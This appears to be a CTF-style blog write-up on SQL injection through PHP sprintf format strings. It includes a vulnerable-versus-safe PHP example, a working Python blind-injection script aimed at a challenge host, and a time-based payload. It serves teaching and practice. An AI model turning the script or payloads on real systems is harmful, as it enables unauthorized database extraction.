SQL Injection

  • MySQL basic syntax
  • MySQL related functions
  • MySQL UNION query injection
  • MySQL error-based injection
  • MySQL boolean-based blind injection
  • MySQL time-based blind injection
  • MySQL stacked-query injection
  • MySQL second-order injection
  • MySQL DNSLog out-of-band data exfiltration
  • MySQL XOR injection
  • MySQL injection: common bypass techniques
  • MySQL injection: advanced bypass techniques
  • SQLMap basic usage
  • SQLMap advanced usage
  • Writing SQLMap tampers
  • MSSQL study notes
  • Oracle study notes
  • MSSQL injection in depth
  • Oracle injection in depth

Format String Injection

Caused by sprintf

When the number of % specifiers equals the number of arguments, they are substituted from front to back; when there are more % specifiers than arguments, the special character $ is needed to pick an argument by position (e.g. %1$).

When we use %1$, it is replaced by the first argument. If the input is then escaped, a \ is placed in front of our quote; sprintf reads the % together with the \ that follows it as one conversion and cleans it away, which means our ' is left behind unescaped and results in SQL injection.
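The mechanism above, as an added PHP example that is not code from the original post or from the challenge it targets: a hypothetical login query built the vulnerable way (escaped input spliced into a string that is later used as the sprintf format) next to a prepared-statement rewrite. The table `users`, its columns and the function names are assumptions.

```php
<?php
// Added example, not from the original post or the targeted challenge.
// Hypothetical login code: the vulnerable pattern next to a safe rewrite.
// Table `users` and its columns are assumptions.

// VULNERABLE. For the password  %1$' || <condition> #  the steps are:
//   addslashes()     ->  %1$\' || <condition> #
//   sprintf()        ->  %1$\ is parsed as a conversion of argument 1 whose
//                        specifier '\' is unknown; PHP 7 emits nothing for
//                        it, so the quote that follows is left unescaped:
//   resulting query  ->  ... AND password='' || <condition> #'
function buildLoginQueryVulnerable(string $username, string $password): string
{
    $template = "SELECT id FROM users WHERE username='%s' AND password='"
              . addslashes($password) . "'";
    // The user-controlled $template is now the format string itself.
    return sprintf($template, addslashes($username));
}

// SAFE. User input never touches a format string or the SQL text: the value
// travels as a bound parameter and the password is checked with
// password_verify() against the stored hash.
function findUserSafe(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, password_hash FROM users WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return $row;
}

// Review rule of thumb: the first argument of sprintf()/printf() must be a
// literal. An untrusted value is passed as a later argument, e.g.
// sprintf('%s', $value), never concatenated into the format string.
```

On PHP 8 the same input makes sprintf() throw a ValueError ("Unknown format specifier"), which stops this particular injection but still leaves the query construction wrong; the prepared-statement version is the fix on every PHP version.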

#coding=utf-8
import requests
import re

url = 'http://eci-2ze006f3h1dki6w6m8h5.cloudeci1.ichunqiu.com/index.php'

flag = ''

# Extract the flag one character at a time with a boolean-based blind
# injection, binary-searching the printable ASCII range (32..126).
for i in range(1, 999):
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2
        # Compare the i-th character of the second row of the derived table
        # (row 0 is the constant 1 from "select 1 union ...") against mid.
        sql = '(ascii(mid((select x.1 from(select 1 union select * from fl4g)x limit 1,1),{},1))>{})'
        # %1$' closes the quote: addslashes turns it into %1$\' and sprintf
        # swallows %1$\ as a conversion, leaving the bare ' behind.
        data = {"username": "admin", "password": "%1$' || " + sql.format(i, mid) + "#"}
        text = requests.post(url=url, data=data).text

        code = re.findall(r' <strong>(.*)</strong>', text, re.S)
        if not code:
            raise RuntimeError('unexpected response: no <strong> block found')
        code = code[0]
        if "Success!" in code:
            low = mid + 1
        else:
            high = mid
    if low == 32:
        # ascii() of a missing character is 0, so every ">" test fails and the
        # search bottoms out at 32: the end of the string has been reached
        # (a real space in the data would stop the loop here as well).
        break
    flag += chr(low)
    print(flag)

# Time-based alternative (takes roughly 2 s per request):
# if((ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),0,1))>1),"n1ctf",1)

All articles on this blog, unless otherwise stated, are licensed under CC BY-SA 4.0; please credit the source when reposting!
